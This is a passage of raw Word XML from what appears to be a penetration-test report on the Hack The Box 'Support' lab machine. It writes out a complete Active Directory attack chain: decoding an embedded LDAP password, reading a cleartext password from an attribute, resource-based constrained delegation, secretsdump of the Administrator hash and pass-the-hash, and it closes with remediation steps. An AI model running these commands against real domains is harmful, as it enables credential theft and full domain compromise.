      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>The assessor replicated this logic in Python to recover the plaintext LDAP credential:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C5A497" w14:textId="72AB9C83" w:rsidR="006000BB" w:rsidRDefault="00E22FF4" w:rsidP="006000BB">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import base64</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>enc_password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">key = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>b"armando</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>data = base64.b64decode(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>enc_password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>result = bytes([(b ^ key[</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(key)]) ^ 0xDF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b in enumerate(data)])</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>result.decode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86D0" w14:textId="3B918C71" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using the recovered </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> account, the assessor queried the info attribute of the support user:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86D1"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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ldapsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -x -H ldap://10.129.11.223 -D "support\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>" -w '&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-password&gt;' \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -b "DC=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>support,DC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>" "(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sAMAccountName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=support)" info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86D2"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info: Ironside47pleasure40Watchful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6E0867" w14:textId="631832D0" w:rsidR="00907577" w:rsidRDefault="00907577">
      <w:pPr>
        <w:spacing w:before="60" w:after="200"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32623F5D" wp14:editId="15B5FA37">
            <wp:extent cx="5731510" cy="2166620"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="766322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22912" name="Picture 7663229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66620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86D3" w14:textId="5EEB5905" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:before="60" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="006B73BF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Cleartext Credential Disclosed via LDAP info Attribute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86D4" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The support account was confirmed as a member of Remote Management Users, permitting authenticated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86D6" w14:textId="47B10066" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4" w:rsidP="00AB5E87">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evil-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>winrm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10.129.11.223 -u support -p 'Ironside47pleasure40Watchful'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86D7" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BloodHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> enumeration confirmed the following attack path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86D8"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 xml:space="preserve">SUPPORT → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MemberOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> → SHARED SUPPORT ACCOUNTS</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">SHARED SUPPORT ACCOUNTS → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GenericAll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> → DC.SUPPORT.HTB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4C8745" w14:textId="3D0803CE" w:rsidR="00AB5E87" w:rsidRDefault="00AB5E87">
      <w:pPr>
        <w:spacing w:before="60" w:after="200"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7786D72A" wp14:editId="3081ABB9">
            <wp:extent cx="5731510" cy="318135"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1263724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4000" name="Picture 12637240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8135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86D9" w14:textId="27357C0F" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:before="60" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="006B73BF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BloodHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attack Path — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GenericAll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> on Domain Controller Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86DA" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The assessor abused this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GenericAll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ACE via a Resource-Based Constrained Delegation attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86DC" w14:textId="33CEAF29" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4" w:rsidP="003379C9">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 xml:space="preserve">addcomputer.py </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>support.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/support:'Ironside47pleasure40Watchful' \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -computer-name 'FAKE$' -computer-pass 'Password123!'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w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">rbcd.py </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>support.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/support:'Ironside47pleasure40Watchful' \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -delegate-from 'FAKE$' -delegate-to 'DC$' -action write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w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">getST.py </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>support.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/FAKE$:'Password123!'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spn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cifs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>dc.support.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -impersonate Administrator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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86DD" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Using the forged service ticket, the assessor extracted the Administrator NT hash:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86DE"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export KRB5CCNAME=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">secretsdump.py -k -no-pass </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>dc.support.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">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10.129.11.223 -just-dc-user Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86E0" w14:textId="57E6D3B6" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4" w:rsidP="00922E3A">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Administrator:500:aad3b435b51404eeaad3b435b51404ee:&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-hash&gt;:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86E1" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>The assessor confirmed domain compromise via Pass-the-Hash:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86E3" w14:textId="749031C4" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4" w:rsidP="00922E3A">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evil-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>winrm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10.129.11.223 -u Administrator -H &lt;administrator-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-hash&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86E4" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86E5" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc233206070"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Remediation Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="081D86E6" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>As a result of this assessment there are several opportunities for Support to strengthen its internal network security. Remediation efforts are prioritized below starting with those that will likely take the least amount of time and effort to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86E7" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc233206071"/>
      <w:r>
        <w:t>Short Term</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="081D86E8" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[Finding 2] – Rotate the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> service account credential immediately; never embed credentials, even obfuscated ones, in distributed binaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86E9" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>[Finding 3] – Audit all AD user objects for credentials stored in the info / comment / description attributes and remove them</w:t>
      </w:r>
    </w:p>
